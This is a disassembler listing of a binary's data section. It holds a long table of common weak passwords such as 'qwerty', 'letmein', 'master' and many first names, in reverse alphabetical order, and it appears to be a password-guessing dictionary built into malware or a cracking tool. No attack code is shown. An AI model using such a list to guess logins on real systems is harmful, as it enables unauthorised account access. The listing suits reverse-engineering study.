aRainbow db 'rainbow',0 ; DATA XREF: ___:0043025C�o
aRain db 'rain',0 ; DATA XREF: ___:00430258�o
align 4
aRaid db 'raid',0 ; DATA XREF: ___:00430254�o
align 4
aRachmani db 'rachmani',0 ; DATA XREF: ___:00430250�o
align 10h
aRachelle db 'rachelle',0 ; DATA XREF: ___:0043024C�o
align 4
aRachel db 'rachel',0 ; DATA XREF: ___:00430248�o
align 4
aRabbit db 'rabbit',0 ; DATA XREF: ___:00430244�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: ___:00430240�o
align 4
aQwert db 'qwert',0 ; DATA XREF: ___:0043023C�o
align 4
aQuebec db 'quebec',0 ; DATA XREF: ___:00430238�o
align 4
aPussy db 'pussy',0 ; DATA XREF: ___:00430234�o
align 4
aPuppet db 'puppet',0 ; DATA XREF: ___:00430230�o
align 4
aPunk db 'punk',0 ; DATA XREF: ___:0043022C�o
align 4
aPunisher db 'punisher',0 ; DATA XREF: ___:00430228�o
align 4
aPuneet db 'puneet',0 ; DATA XREF: ___:00430224�o
align 10h
aPumpkin db 'pumpkin',0 ; DATA XREF: ___:00430220�o
aPuke db 'puke',0 ; DATA XREF: ___:0043021C�o
align 10h
aPuck db 'puck',0 ; DATA XREF: ___:00430218�o
align 4
aPublic db 'public',0 ; DATA XREF: ___:00430214�o
align 10h
aPsychopa db 'psychopa',0 ; DATA XREF: ___:00430210�o
align 4
aPsycho db 'psycho',0 ; DATA XREF: ___:0043020C�o
align 4
aProtozoa db 'protozoa',0 ; DATA XREF: ___:00430208�o
align 10h
aProtect db 'protect',0 ; DATA XREF: ___:00430204�o
aPrompt db 'prompt',0 ; DATA XREF: ___:00430200�o
align 10h
aProgram db 'program',0 ; DATA XREF: ___:004301FC�o
aProfile db 'profile',0 ; DATA XREF: ___:004301F8�o
aProfesso db 'professo',0 ; DATA XREF: ___:004301F4�o
align 4
aProcesso db 'processo',0 ; DATA XREF: ___:004301F0�o
align 4
aProceed db 'proceed',0 ; DATA XREF: ___:004301EC�o
aPrivs db 'privs',0 ; DATA XREF: ___:004301E8�o
align 4
aPrivate db 'private',0 ; DATA XREF: ___:004301E4�o
aPriv db 'priv',0 ; DATA XREF: ___:004301E0�o
align 4
aPrinter db 'printer',0 ; DATA XREF: ___:004301DC�o
aPrinceto db 'princeto',0 ; DATA XREF: ___:004301D8�o
align 4
aPrince db 'prince',0 ; DATA XREF: ___:004301D4�o
align 4
aPresto db 'presto',0 ; DATA XREF: ___:004301D0�o
align 4
aPrelude db 'prelude',0 ; DATA XREF: ___:004301CC�o
aPrecious db 'precious',0 ; DATA XREF: ___:004301C8�o
align 10h
aPraise db 'praise',0 ; DATA XREF: ___:004301C4�o
align 4
aPower db 'power',0 ; DATA XREF: ___:004301C0�o
align 10h
aPoster db 'poster',0 ; DATA XREF: ___:004301BC�o
align 4
aPost db 'post',0 ; DATA XREF: ___:004301B8�o
align 10h
aPorsche db 'porsche',0 ; DATA XREF: ___:004301B4�o
aPorno db 'porno',0 ; DATA XREF: ___:004301B0�o
align 10h
aPorn db 'porn',0 ; DATA XREF: ___:004301AC�o
align 4
aPork db 'pork',0 ; DATA XREF: ___:004301A8�o
align 10h
aPoor db 'poor',0 ; DATA XREF: ___:004301A4�o
align 4
aPoop db 'poop',0 ; DATA XREF: ___:004301A0�o
align 10h
aPonderin db 'ponderin',0 ; DATA XREF: ___:0043019C�o
align 4
aPolynomi db 'polynomi',0 ; DATA XREF: ___:00430198�o
align 4
aPolly db 'polly',0 ; DATA XREF: ___:00430194�o
align 10h
aPolice db 'police',0 ; DATA XREF: ___:00430190�o
align 4
aPoetry db 'poetry',0 ; DATA XREF: ___:0043018C�o
align 10h
aPlymouth db 'plymouth',0 ; DATA XREF: ___:00430188�o
align 4
aPluto db 'pluto',0 ; DATA XREF: ___:00430184�o
align 4
aPlover db 'plover',0 ; DATA XREF: ___:00430180�o
align 4
aPlayboy db 'playboy',0 ; DATA XREF: ___:0043017C�o
aPlane db 'plane',0 ; DATA XREF: ___:00430178�o
align 4
aPizza db 'pizza',0 ; DATA XREF: ___:00430174�o
align 4
aPiss db 'piss',0 ; DATA XREF: ___:00430170�o
align 4
aPinname db 'pinname',0 ; DATA XREF: ___:0043016C�o
aPimp db 'pimp',0 ; DATA XREF: ___:00430168�o
align 4
aPierre db 'pierre',0 ; DATA XREF: ___:00430164�o
align 4
aPick db 'pick',0 ; DATA XREF: ___:00430160�o
align 4
aPhuck db 'phuck',0 ; DATA XREF: ___:0043015C�o
align 4
aPhreak db 'phreak',0 ; DATA XREF: ___:00430158�o
align 4
aPhrase db 'phrase',0 ; DATA XREF: ___:00430154�o
align 4
aPhrack db 'phrack',0 ; DATA XREF: ___:00430150�o
align 4
aPhoton db 'photon',0 ; DATA XREF: ___:0043014C�o
align 4
aPhone db 'phone',0 ; DATA XREF: ___:00430148�o
align 4
aPhoenix db 'phoenix',0 ; DATA XREF: ___:00430144�o
aPhilip db 'philip',0 ; DATA XREF: ___:00430140�o
align 4
aPhil db 'phil',0 ; DATA XREF: ___:0043013C�o
align 4
aPeter db 'peter',0 ; DATA XREF: ___:00430138�o
align 4
aPete db 'pete',0 ; DATA XREF: ___:00430134�o
align 4
aPervert db 'pervert',0 ; DATA XREF: ___:00430130�o
aPersona db 'persona',0 ; DATA XREF: ___:0043012C�o
aPersimmo db 'persimmo',0 ; DATA XREF: ___:00430128�o
align 10h
aPermit db 'permit',0 ; DATA XREF: ___:00430124�o
align 4
aPerfect db 'perfect',0 ; DATA XREF: ___:00430120�o
aPercolat db 'percolat',0 ; DATA XREF: ___:0043011C�o
align 4
aPepper db 'pepper',0 ; DATA XREF: ___:00430118�o
align 4
aPeoria db 'peoria',0 ; DATA XREF: ___:00430114�o
align 4
aPentium db 'pentium',0 ; DATA XREF: ___:00430110�o
aPenthous db 'penthous',0 ; DATA XREF: ___:0043010C�o
align 10h
aPentagra db 'pentagra',0 ; DATA XREF: ___:00430108�o
align 4
aPentagon db 'pentagon',0 ; DATA XREF: ___:00430104�o
align 4
aPenname db 'penname',0 ; DATA XREF: ___:00430100�o
aPenis db 'penis',0 ; DATA XREF: ___:004300FC�o
align 4
aPenguin db 'penguin',0 ; DATA XREF: ___:004300F8�o
aPenelope db 'penelope',0 ; DATA XREF: ___:004300F4�o
align 4
aPencil db 'pencil',0 ; DATA XREF: ___:004300F0�o
align 4
aPecker db 'pecker',0 ; DATA XREF: ___:004300EC�o
align 4
aPeanuts db 'peanuts',0 ; DATA XREF: ___:004300E8�o
aPaula db 'paula',0 ; DATA XREF: ___:004300E4�o
align 4
aPatty db 'patty',0 ; DATA XREF: ___:004300E0�o
align 4
aPatriot db 'patriot',0 ; DATA XREF: ___:004300DC�o
aPatricia db 'patricia',0 ; DATA XREF: ___:004300D8�o
align 4
aPaste db 'paste',0 ; DATA XREF: ___:004300D4�o
align 10h
aPassphra db 'passphra',0 ; DATA XREF: ___:004300D0�o
align 4
aPascal db 'pascal',0 ; DATA XREF: ___:004300CC�o
align 4
aPapers db 'papers',0 ; DATA XREF: ___:004300C8�o
align 4
aPaper db 'paper',0 ; DATA XREF: ___:004300C4�o
align 4
aPapa db 'papa',0 ; DATA XREF: ___:004300C0�o
align 4
aPamela db 'pamela',0 ; DATA XREF: ___:004300BC�o
align 4
aPakistan db 'pakistan',0 ; DATA XREF: ___:004300B8�o
align 10h
aPaint db 'paint',0 ; DATA XREF: ___:004300B4�o
align 4
aPainless db 'painless',0 ; DATA XREF: ___:004300B0�o
align 4
aPacker db 'packer',0 ; DATA XREF: ___:004300AC�o
align 4
aPackard db 'packard',0 ; DATA XREF: ___:004300A8�o
aPacific db 'pacific',0 ; DATA XREF: ___:004300A4�o
aOxford db 'oxford',0 ; DATA XREF: ___:004300A0�o
align 4
aOutside db 'outside',0 ; DATA XREF: ___:0043009C�o
aOutput db 'output',0 ; DATA XREF: ___:00430098�o
align 4
aOutlaw db 'outlaw',0 ; DATA XREF: ___:00430094�o
align 4
aOutdoors db 'outdoors',0 ; DATA XREF: ___:00430090�o
align 4
aOsiris db 'osiris',0 ; DATA XREF: ___:0043008C�o
align 10h
aOscar db 'oscar',0 ; DATA XREF: ___:00430088�o
align 4
aOrwell db 'orwell',0 ; DATA XREF: ___:00430084�o
align 10h
aOrient db 'orient',0 ; DATA XREF: ___:00430080�o
align 4
aOrca db 'orca',0 ; DATA XREF: ___:0043007C�o
align 10h
aOperator db 'operator',0 ; DATA XREF: ___:00430078�o
align 4
aOpensesa db 'opensesa',0 ; DATA XREF: ___:00430074�o
align 4
aOpenlock db 'openlock',0 ; DATA XREF: ___:00430070�o
align 4
aOpening db 'opening',0 ; DATA XREF: ___:0043006C�o
aOmega db 'omega',0 ; DATA XREF: ___:00430064�o
align 4
aOlivia db 'olivia',0 ; DATA XREF: ___:00430060�o
align 4
aOlivetti db 'olivetti',0 ; DATA XREF: ___:off_43005C�o
align 4
aOldage db 'oldage',0 ; DATA XREF: ___:00430058�o
align 10h
aOkay db 'okay',0 ; DATA XREF: ___:00430054�o
align 4
aOffice db 'office',0 ; DATA XREF: ___:off_430050�o
align 10h
aOcelot db 'ocelot',0 ; DATA XREF: ___:0043004C�o
align 4
aOceanogr db 'oceanogr',0 ; DATA XREF: ___:00430048�o
align 4
aObscurit db 'obscurit',0 ; DATA XREF: ___:00430044�o
align 10h
aNyquist db 'nyquist',0 ; DATA XREF: ___:00430040�o
aNuts db 'nuts',0 ; DATA XREF: ___:0043003C�o
align 10h
aNutritio db 'nutritio',0 ; DATA XREF: ___:00430038�o
align 4
aNumber db 'number',0 ; DATA XREF: ___:00430034�o
align 4
aNull_1 db 'null',0 ; DATA XREF: ___:00430030�o
align 4
aNukem db 'nukem',0 ; DATA XREF: ___:0043002C�o
align 4
aNuke db 'nuke',0 ; DATA XREF: ___:00430028�o
align 4
aNude db 'nude',0 ; DATA XREF: ___:00430024�o
align 4
aNuclear db 'nuclear',0 ; DATA XREF: ___:00430020�o
aNoxious db 'noxious',0 ; DATA XREF: ___:0043001C�o
aNovember db 'november',0 ; DATA XREF: ___:00430018�o
align 10h
aNovel db 'novel',0 ; DATA XREF: ___:00430014�o
align 4
aNova db 'nova',0 ; DATA XREF: ___:00430010�o
align 10h
aNoth db 'noth',0 ; DATA XREF: ___:0043000C�o
align 4
aNotes db 'notes',0 ; DATA XREF: ___:00430008�o
align 10h
aNoreen db 'noreen',0 ; DATA XREF: ___:00430004�o
align 4
aNode db 'node',0 ; DATA XREF: ___:00430000�o
align 10h
aNobody db 'nobody',0 ; DATA XREF: ___:0042FFFC�o
align 4
aNoble db 'noble',0 ; DATA XREF: ___:0042FFF8�o
align 10h
aNnaacp db 'nnaacp',0 ; DATA XREF: ___:0042FFF4�o
align 4
aNita db 'nita',0 ; DATA XREF: ___:0042FFF0�o
align 10h
aNintendo db 'nintendo',0 ; DATA XREF: ___:0042FFEC�o
align 4
aNightmar db 'nightmar',0 ; DATA XREF: ___:0042FFE8�o
align 4
aNight db 'night',0 ; DATA XREF: ___:0042FFE4�o
align 10h
aNicotine db 'nicotine',0 ; DATA XREF: ___:0042FFE0�o
align 4
aNicole db 'nicole',0 ; DATA XREF: ___:0042FFDC�o
align 4
aNice db 'nice',0 ; DATA XREF: ___:0042FFD8�o
align 4
aNext db 'next',0 ; DATA XREF: ___:0042FFD4�o
align 4
aNewyork db 'newyork',0 ; DATA XREF: ___:0042FFD0�o
aNewton db 'newton',0 ; DATA XREF: ___:0042FFCC�o
align 4
aNewsgrou db 'newsgrou',0 ; DATA XREF: ___:0042FFC8�o
align 10h
aNews db 'news',0 ; DATA XREF: ___:0042FFC4�o
align 4
aNewborn db 'newborn',0 ; DATA XREF: ___:0042FFC0�o
aNetwork_0 db 'network',0 ; DATA XREF: ___:0042FFBC�o
aNetscape db 'netscape',0 ; DATA XREF: ___:0042FFB8�o
align 4
aNess db 'ness',0 ; DATA XREF: ___:0042FFB4�o
align 4
aNeptune db 'neptune',0 ; DATA XREF: ___:0042FFB0�o
aNepenthe db 'nepenthe',0 ; DATA XREF: ___:0042FFAC�o
align 10h
aNavy db 'navy',0 ; DATA XREF: ___:0042FFA8�o
align 4
aNasa db 'nasa',0 ; DATA XREF: ___:0042FFA4�o
align 10h
aNapoleon db 'napoleon',0 ; DATA XREF: ___:0042FFA0�o
align 4
aNancy db 'nancy',0 ; DATA XREF: ___:0042FF9C�o
align 4
aName db 'name',0 ; DATA XREF: ___:0042FF98�o
align 4
aNagel db 'nagel',0 ; DATA XREF: ___:0042FF94�o
align 4
aMutant db 'mutant',0 ; DATA XREF: ___:0042FF90�o
align 4
aMuppets db 'muppets',0 ; DATA XREF: ___:0042FF8C�o
aMsdos db 'msdos',0 ; DATA XREF: ___:0042FF88�o
align 4
aMpeg db 'mpeg',0 ; DATA XREF: ___:0042FF84�o
align 4
aMozart db 'mozart',0 ; DATA XREF: ___:0042FF80�o
align 4
aMovies db 'movies',0 ; DATA XREF: ___:0042FF7C�o
align 4
aMovie db 'movie',0 ; DATA XREF: ___:0042FF78�o
align 4
aMove db 'move',0 ; DATA XREF: ___:0042FF74�o
align 4
aMouse db 'mouse',0 ; DATA XREF: ___:0042FF70�o
align 4
aMountain db 'mountain',0 ; DATA XREF: ___:0042FF6C�o
align 4
aMosaic db 'mosaic',0 ; DATA XREF: ___:0042FF68�o
align 10h
aMortgage db 'mortgage',0 ; DATA XREF: ___:0042FF64�o
align 4
aMortalco db 'mortalco',0 ; DATA XREF: ___:0042FF60�o
align 4
aMortal db 'mortal',0 ; DATA XREF: ___:0042FF5C�o
align 10h
aMorris db 'morris',0 ; DATA XREF: ___:0042FF58�o
align 4
aMorley db 'morley',0 ; DATA XREF: ___:0042FF54�o
align 10h
aMore db 'more',0 ; DATA XREF: ___:0042FF50�o
align 4
aMoose db 'moose',0 ; DATA XREF: ___:0042FF4C�o
align 10h
aMoor db 'moor',0 ; DATA XREF: ___:0042FF48�o
align 4
aMoom db 'moom',0 ; DATA XREF: ___:0042FF44�o
align 10h
aMonica db 'monica',0 ; DATA XREF: ___:0042FF40�o
align 4
aMonday db 'monday',0 ; DATA XREF: ___:0042FF3C�o
align 10h
aMoguls db 'moguls',0 ; DATA XREF: ___:0042FF38�o
align 4
aMogul db 'mogul',0 ; DATA XREF: ___:0042FF34�o
align 10h
aModem db 'modem',0 ; DATA XREF: ___:0042FF30�o
align 4
aMode db 'mode',0 ; DATA XREF: ___:0042FF2C�o
align 10h
aMkii db 'mkii',0 ; DATA XREF: ___:0042FF28�o
align 4
aMission db 'mission',0 ; DATA XREF: ___:0042FF24�o
aMisfit db 'misfit',0 ; DATA XREF: ___:0042FF20�o
align 4
aMinsky db 'minsky',0 ; DATA XREF: ___:0042FF1C�o
align 10h
aMinimum db 'minimum',0 ; DATA XREF: ___:0042FF18�o
aMine db 'mine',0 ; DATA XREF: ___:0042FF14�o
align 10h
aMike db 'mike',0 ; DATA XREF: ___:0042FF10�o
align 4
aMidieval db 'midieval',0 ; DATA XREF: ___:0042FF0C�o
align 4
aMicrosof db 'microsof',0 ; DATA XREF: ___:0042FF08�o
align 10h
aMicropro db 'micropro',0 ; DATA XREF: ___:0042FF04�o
align 4
aMicrochi db 'microchi',0 ; DATA XREF: ___:0042FF00�o
align 4
aMicro db 'micro',0 ; DATA XREF: ___:0042FEFC�o
align 10h
aMickey db 'mickey',0 ; DATA XREF: ___:0042FEF8�o
align 4
aMichelle db 'michelle',0 ; DATA XREF: ___:0042FEF4�o
align 4
aMichele db 'michele',0 ; DATA XREF: ___:0042FEF0�o
aMichelan db 'michelan',0 ; DATA XREF: ___:0042FEEC�o
align 4
aMichel db 'michel',0 ; DATA XREF: ___:0042FEE8�o
align 10h
aMichael db 'michael',0 ; DATA XREF: ___:0042FEE4�o
aMice db 'mice',0 ; DATA XREF: ___:0042FEE0�o
align 10h
aMets db 'mets',0 ; DATA XREF: ___:0042FEDC�o
align 4
aMetalica db 'metalica',0 ; DATA XREF: ___:0042FED8�o
align 4
aMetalhea db 'metalhea',0 ; DATA XREF: ___:0042FED4�o
align 10h
aMetal db 'metal',0 ; DATA XREF: ___:0042FED0�o
align 4
aMerlin db 'merlin',0 ; DATA XREF: ___:0042FECC�o
align 10h
aMercury db 'mercury',0 ; DATA XREF: ___:0042FEC8�o
aMenu db 'menu',0 ; DATA XREF: ___:0042FEC4�o
align 10h
aMenace db 'menace',0 ; DATA XREF: ___:0042FEC0�o
align 4
aMemory db 'memory',0 ; DATA XREF: ___:0042FEBC�o
align 10h
aMember db 'member',0 ; DATA XREF: ___:0042FEB8�o
align 4
aMelrose db 'melrose',0 ; DATA XREF: ___:0042FEB4�o
aMellon db 'mellon',0 ; DATA XREF: ___:0042FEB0�o
align 4
aMelissa db 'melissa',0 ; DATA XREF: ___:0042FEAC�o
aMegan db 'megan',0 ; DATA XREF: ___:0042FEA8�o
align 4
aMegadeth db 'megadeth',0 ; DATA XREF: ___:0042FEA4�o
align 4
aMegabyte db 'megabyte',0 ; DATA XREF: ___:0042FEA0�o
align 10h
aMeagan db 'meagan',0 ; DATA XREF: ___:0042FE9C�o
align 4
aMaurice db 'maurice',0 ; DATA XREF: ___:0042FE98�o
aMath db 'math',0 ; DATA XREF: ___:0042FE94�o
align 4
aMaster db 'master',0 ; DATA XREF: ___:0042FE90�o
align 10h
aMason db 'mason',0 ; DATA XREF: ___:0042FE8C�o
align 4
aMary db 'mary',0 ; DATA XREF: ___:0042FE88�o
align 10h
aMarvin db 'marvin',0 ; DATA XREF: ___:0042FE84�o
align 4
aMarty db 'marty',0 ; DATA XREF: ___:0042FE80�o
align 10h
aMars db 'mars',0 ; DATA XREF: ___:0042FE7C�o
align 4
aMarriage db 'marriage',0 ; DATA XREF: ___:0042FE78�o
align 4
aMarni db 'marni',0 ; DATA XREF: ___:0042FE74�o
align 4
aMarkus db 'markus',0 ; DATA XREF: ___:0042FE70�o
align 4
aMark db 'mark',0 ; DATA XREF: ___:0042FE6C�o
align 4
aMarines db 'marines',0 ; DATA XREF: ___:0042FE68�o
aMarijuan db 'marijuan',0 ; DATA XREF: ___:0042FE64�o
align 10h
aMarietta db 'marietta',0 ; DATA XREF: ___:0042FE60�o
align 4
aMariens db 'mariens',0 ; DATA XREF: ___:0042FE5C�o
aMaria db 'maria',0 ; DATA XREF: ___:0042FE58�o
align 4
aMarcy db 'marcy',0 ; DATA XREF: ___:0042FE54�o
align 4
aMarci db 'marci',0 ; DATA XREF: ___:0042FE50�o
align 4
aMara db 'mara',0 ; DATA XREF: ___:0042FE4C�o
align 4
aManager db 'manager',0 ; DATA XREF: ___:0042FE48�o
aMana db 'mana',0 ; DATA XREF: ___:0042FE44�o
align 4
aMalcom db 'malcom',0 ; DATA XREF: ___:0042FE40�o
align 4
aMalcolm db 'malcolm',0 ; DATA XREF: ___:0042FE3C�o
aMaint db 'maint',0 ; DATA XREF: ___:0042FE38�o
align 4
aMail db 'mail',0 ; DATA XREF: ___:0042FE34�o
align 4
aMagnet db 'magnet',0 ; DATA XREF: ___:0042FE30�o
align 4
aMagic db 'magic',0 ; DATA XREF: ___:0042FE2C�o
align 4
aMaggot db 'maggot',0 ; DATA XREF: ___:0042FE28�o
align 4
aMacro db 'macro',0 ; DATA XREF: ___:0042FE24�o
align 4
aMack db 'mack',0 ; DATA XREF: ___:0042FE20�o
align 4
aMacintos db 'macintos',0 ; DATA XREF: ___:0042FE1C�o
align 4
aMachine db 'machine',0 ; DATA XREF: ___:0042FE18�o
aLynne db 'lynne',0 ; DATA XREF: ___:0042FE14�o
align 4
aLynn db 'lynn',0 ; DATA XREF: ___:0042FE10�o
align 10h
aLust db 'lust',0 ; DATA XREF: ___:0042FE0C�o
align 4
aLuke db 'luke',0 ; DATA XREF: ___:0042FE08�o
align 10h
aLude db 'lude',0 ; DATA XREF: ___:0042FE04�o
align 4
aLucy db 'lucy',0 ; DATA XREF: ___:0042FE00�o
align 10h
aLucus db 'lucus',0 ; DATA XREF: ___:0042FDFC�o
align 4
aLuck db 'luck',0 ; DATA XREF: ___:0042FDF8�o
align 10h
aLover db 'lover',0 ; DATA XREF: ___:0042FDF4�o
align 4
aLovebug db 'lovebug',0 ; DATA XREF: ___:0042FDF0�o
aLouis db 'louis',0 ; DATA XREF: ___:0042FDEC�o
align 4
aLoser db 'loser',0 ; DATA XREF: ___:0042FDE8�o
align 10h
aLorraine db 'lorraine',0 ; DATA XREF: ___:0042FDE4�o
align 4
aLorin db 'lorin',0 ; DATA XREF: ___:0042FDE0�o
align 4
aLori db 'lori',0 ; DATA XREF: ___:0042FDDC�o
align 4
aLore db 'lore',0 ; DATA XREF: ___:0042FDD8�o
align 4
aLoose db 'loose',0 ; DATA XREF: ___:0042FDD4�o
align 4
aLolopc db 'lolopc',0 ; DATA XREF: ___:0042FDD0�o
align 4
aLois db 'lois',0 ; DATA XREF: ___:0042FDCC�o
align 4
aLogout db 'logout',0 ; DATA XREF: ___:0042FDC8�o
align 4
aLoginwor db 'loginwor',0 ; DATA XREF: ___:0042FDC4�o
align 10h
aLogic db 'logic',0 ; DATA XREF: ___:0042FDC0�o
align 4
aLockword db 'lockword',0 ; DATA XREF: ___:0042FDBC�o
align 4
aLockout db 'lockout',0 ; DATA XREF: ___:0042FDB8�o
aLock db 'lock',0 ; DATA XREF: ___:0042FDB4�o
align 4
aLoad db 'load',0 ; DATA XREF: ___:0042FDB0�o
align 4
aLive db 'live',0 ; DATA XREF: ___:0042FDAC�o
align 4
aLiteratu db 'literatu',0 ; DATA XREF: ___:0042FDA8�o
align 10h
aLisp db 'lisp',0 ; DATA XREF: ___:0042FDA4�o
align 4
aLisa db 'lisa',0 ; DATA XREF: ___:0042FDA0�o
align 10h
aLips db 'lips',0 ; DATA XREF: ___:0042FD9C�o
align 4
aLion db 'lion',0 ; DATA XREF: ___:0042FD98�o
align 10h
aLink db 'link',0 ; DATA XREF: ___:0042FD94�o
align 4
aLinda db 'linda',0 ; DATA XREF: ___:0042FD90�o
align 10h
aLimited db 'limited',0 ; DATA XREF: ___:0042FD8C�o
aLimbaugh db 'limbaugh',0 ; DATA XREF: ___:0042FD88�o
align 4
aLima db 'lima',0 ; DATA XREF: ___:0042FD84�o
align 4
aLightsab db 'lightsab',0 ; DATA XREF: ___:0042FD80�o
align 4
aLight db 'light',0 ; DATA XREF: ___:0042FD7C�o
align 10h
aLife db 'life',0 ; DATA XREF: ___:0042FD78�o
align 4
aLicker db 'licker',0 ; DATA XREF: ___:0042FD74�o
align 10h
aLick db 'lick',0 ; DATA XREF: ___:0042FD70�o
align 4
aLibrary db 'library',0 ; DATA XREF: ___:0042FD6C�o
aLiberal db 'liberal',0 ; DATA XREF: ___:0042FD68�o
aLexluthe db 'lexluthe',0 ; DATA XREF: ___:0042FD64�o
align 4
aLewis db 'lewis',0 ; DATA XREF: ___:0042FD60�o
align 4
aLetmein db 'letmein',0 ; DATA XREF: ___:0042FD5C�o
aLeslie db 'leslie',0 ; DATA XREF: ___:0042FD58�o
align 4
aLesbian db 'lesbian',0 ; DATA XREF: ___:0042FD54�o
aLeroy db 'leroy',0 ; DATA XREF: ___:0042FD50�o
align 4
aLeland db 'leland',0 ; DATA XREF: ___:0042FD4C�o
align 4
aLegal db 'legal',0 ; DATA XREF: ___:0042FD48�o
align 4
aLeftwing db 'leftwing',0 ; DATA XREF: ___:0042FD44�o
align 4
aLeft db 'left',0 ; DATA XREF: ___:0042FD40�o
align 10h
aLebesgue db 'lebesgue',0 ; DATA XREF: ___:0042FD3C�o
align 4
aLeah db 'leah',0 ; DATA XREF: ___:0042FD38�o
align 4
aLazer db 'lazer',0 ; DATA XREF: ___:0042FD34�o
align 4
aLazarus db 'lazarus',0 ; DATA XREF: ___:0042FD30�o
aLava db 'lava',0 ; DATA XREF: ___:0042FD2C�o
align 4
aLaura db 'laura',0 ; DATA XREF: ___:0042FD28�o
align 4
aLaser db 'laser',0 ; DATA XREF: ___:0042FD24�o
align 4
aLarry db 'larry',0 ; DATA XREF: ___:0042FD20�o
align 4
aLarkin db 'larkin',0 ; DATA XREF: ___:0042FD1C�o
align 4
aLara db 'lara',0 ; DATA XREF: ___:0042FD18�o
align 4
aLaptop db 'laptop',0 ; DATA XREF: ___:0042FD14�o
align 4
aLana db 'lana',0 ; DATA XREF: ___:0042FD10�o
align 4
aLaminati db 'laminati',0 ; DATA XREF: ___:0042FD0C�o
align 10h
aLambda db 'lambda',0 ; DATA XREF: ___:0042FD08�o
align 4
aLakers db 'lakers',0 ; DATA XREF: ___:0042FD04�o
align 10h
aLadle db 'ladle',0 ; DATA XREF: ___:0042FD00�o
align 4
aLadies db 'ladies',0 ; DATA XREF: ___:0042FCFC�o
align 10h
aKristy db 'kristy',0 ; DATA XREF: ___:0042FCF8�o
align 4
aKristine db 'kristine',0 ; DATA XREF: ___:0042FCF4�o
align 4
aKristin db 'kristin',0 ; DATA XREF: ___:0042FCF0�o
aKristie db 'kristie',0 ; DATA XREF: ___:0042FCEC�o
aKristi db 'kristi',0 ; DATA XREF: ___:0042FCE8�o
align 4
aKristen db 'kristen',0 ; DATA XREF: ___:0042FCE4�o
aKrista db 'krista',0 ; DATA XREF: ___:0042FCE0�o
align 4
aKnown db 'known',0 ; DATA XREF: ___:0042FCDC�o
align 4
aKnightma db 'knightma',0 ; DATA XREF: ___:0042FCD8�o
align 10h
aKnight db 'knight',0 ; DATA XREF: ___:0042FCD4�o
align 4
aKnife db 'knife',0 ; DATA XREF: ___:0042FCD0�o
align 10h
aKlingon db 'klingon',0 ; DATA XREF: ___:0042FCCC�o
aKitten db 'kitten',0 ; DATA XREF: ___:0042FCC8�o
align 10h
aKissmyas db 'kissmyas',0 ; DATA XREF: ___:0042FCC4�o
align 4
aKiss db 'kiss',0 ; DATA XREF: ___:0042FCC0�o
align 4
aKirkland db 'kirkland',0 ; DATA XREF: ___:0042FCBC�o
align 10h
aKirk db 'kirk',0 ; DATA XREF: ___:0042FCB8�o
align 4
aKing db 'king',0 ; DATA XREF: ___:0042FCB4�o
align 10h
aKimberly db 'kimberly',0 ; DATA XREF: ___:0042FCB0�o
align 4
aKilo db 'kilo',0 ; DATA XREF: ___:0042FCAC�o
align 4
aKillthem db 'killthem',0 ; DATA XREF: ___:0042FCA8�o
align 10h
aKill db 'kill',0 ; DATA XREF: ___:0042FCA4�o
align 4
aKids db 'kids',0 ; DATA XREF: ___:0042FCA0�o
align 10h
aKeyword db 'keyword',0 ; DATA XREF: ___:0042FC9C�o
aKeyin db 'keyin',0 ; DATA XREF: ___:0042FC98�o
align 10h
aKeybord db 'keybord',0 ; DATA XREF: ___:0042FC94�o
aKewl db 'kewl',0 ; DATA XREF: ___:0042FC90�o
align 10h
aKevin db 'kevin',0 ; DATA XREF: ___:0042FC8C�o
align 4
aKerry db 'kerry',0 ; DATA XREF: ___:0042FC88�o
align 10h
aKerrie db 'kerrie',0 ; DATA XREF: ___:0042FC84�o
align 4
aKerri db 'kerri',0 ; DATA XREF: ___:0042FC80�o
align 10h
aKernel db 'kernel',0 ; DATA XREF: ___:0042FC7C�o
align 4
aKermit db 'kermit',0 ; DATA XREF: ___:0042FC78�o
align 10h
aKeri db 'keri',0 ; DATA XREF: ___:0042FC74�o
align 4
aKelly db 'kelly',0 ; DATA XREF: ___:0042FC70�o
align 10h
aKatrina db 'katrina',0 ; DATA XREF: ___:0042FC6C�o
aKatina db 'katina',0 ; DATA XREF: ___:0042FC68�o
align 10h
aKathy db 'kathy',0 ; DATA XREF: ___:0042FC64�o
align 4
aKathrine db 'kathrine',0 ; DATA XREF: ___:0042FC60�o
align 4
aKathleen db 'kathleen',0 ; DATA XREF: ___:0042FC5C�o
align 10h
aKate db 'kate',0 ; DATA XREF: ___:0042FC58�o
align 4
aKatana db 'katana',0 ; DATA XREF: ___:0042FC54�o
align 10h
aKarina db 'karina',0 ; DATA XREF: ___:0042FC50�o
align 4
aKarie db 'karie',0 ; DATA XREF: ___:0042FC4C�o
align 10h
aKaren db 'karen',0 ; DATA XREF: ___:0042FC48�o
align 4
aKaka db 'kaka',0 ; DATA XREF: ___:0042FC44�o
align 10h
aJupiter db 'jupiter',0 ; DATA XREF: ___:0042FC40�o
aJune db 'june',0 ; DATA XREF: ___:0042FC3C�o
align 10h
aJuliet db 'juliet',0 ; DATA XREF: ___:0042FC38�o
align 4
aJulie db 'julie',0 ; DATA XREF: ___:0042FC34�o
align 10h
aJulia db 'julia',0 ; DATA XREF: ___:0042FC30�o
align 4
aJuicy db 'juicy',0 ; DATA XREF: ___:0042FC2C�o
align 10h
aJuggle db 'juggle',0 ; DATA XREF: ___:0042FC28�o
align 4
aJudy db 'judy',0 ; DATA XREF: ___:0042FC24�o
align 10h
aJudith db 'judith',0 ; DATA XREF: ___:0042FC20�o
align 4
aJoyce db 'joyce',0 ; DATA XREF: ___:0042FC1C�o
align 10h
aJournal db 'journal',0 ; DATA XREF: ___:0042FC18�o
aJoshua db 'joshua',0 ; DATA XREF: ___:0042FC14�o
align 10h
aJoseph db 'joseph',0 ; DATA XREF: ___:0042FC10�o
align 4
aJohnny db 'johnny',0 ; DATA XREF: ___:0042FC0C�o
align 10h
aJohndoe db 'johndoe',0 ; DATA XREF: ___:0042FC08�o
aJohn db 'john',0 ; DATA XREF: ___:0042FC04�o
align 10h
aJody db 'jody',0 ; DATA XREF: ___:0042FC00�o
align 4
aJoanne db 'joanne',0 ; DATA XREF: ___:0042FBFC�o
align 10h
aJixian db 'jixian',0 ; DATA XREF: ___:0042FBF8�o
align 4
aJill db 'jill',0 ; DATA XREF: ___:0042FBF4�o
align 10h
aJewelry db 'jewelry',0 ; DATA XREF: ___:0042FBF0�o
aJester db 'jester',0 ; DATA XREF: ___:0042FBEC�o
align 10h
